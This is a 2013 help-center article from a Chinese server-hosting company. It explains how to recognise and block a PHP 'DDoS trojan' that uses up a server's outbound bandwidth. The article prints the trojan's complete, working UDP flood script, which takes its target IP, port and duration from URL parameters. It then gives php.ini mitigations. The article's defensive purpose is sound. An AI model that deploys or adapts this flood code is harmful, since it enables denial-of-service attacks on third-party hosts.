武汉双线机房 解决互联互通 使用双线托管 免费智能解析 登录会员系统
武汉双线机房 电信联通双线接入 解决国内互联互通 武汉双线机房 电信联通双线接入 服务器租用送产权 武汉双线机房 电信联通双线接入 双线虚拟主机 免费提供智能DNS解析 中电科长江数据股份有限公司
客户中心
关于我们
 
   当前位置:首页 > 客户中心 > 帮助中心 > 服务器相关帮助
PHP代码DDOS造成用光网络带宽解决方法
来源:WHIDC.COM  作者:武汉双线机房  发布时间:2013-2-28 17:35:16  浏览:

有的客户在使用服务器的过程中,突然发现服务器无法访问,然后联系我们的客服人员,发现系统很正常,但是带宽却是满载,一般遇到这个对外发包的情况就有可能是服务器里网站里存在有PHPDOS木马,黑客通过在IIS里运行PHPDOS的木马,用PHP代码调用sockets,直接用服务器的网络攻击别的IP,并且耗费服务器本机带宽 。

一般PHPdos木马代码如下:
$packets = 0;
$ip = $_GET[\'ip\'];
$rand = $_GET[\'port\'];
set_time_limit(0);
ignore_user_abort(FALSE);

$exec_time = $_GET[\'time\'];

$time = time();
print \"Flooded: $ip on port $rand

\";
$max_time = $time+$exec_time;


for($i=0;$i<65535;$i++){
$out .= \"X\";
}
while(1){
$packets++;
if(time() > $max_time){
break;
}

$fp = fsockopen(\"udp://$ip\", $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo \"Packet complete at \".time(\'h:i:s\').\" with $packets (\" . round(($packets*65)/1024, 2) . \" mB) packets averaging \". round($packets/$exec_time, 2) . \" packets/s \\n\";
?>

表现特征:

一打开IIS,服务器的流出带宽就用光-----就是说服务器不断向别人发包,这个情况和受到DDOS攻击是不同的,DDOS是不断收到大量数据包.

解决办法:

在php.ini里设其值为Off

allow_url_fopen = Off

并且:

;extension=php_sockets.dll

前面的;号一定要有,意思就是限制用sockets.dll

然后重启IIS。

在做好以上设置后,多检查自己的程序有没有新补丁没有升级之类的,防止黑客入侵上传类似的木马。


上一篇: 3389远程桌面“终端服务器超出了最大允许连接数”的解决方法汇总  下一篇: Linux操作系统应用服务器的常用备份的方法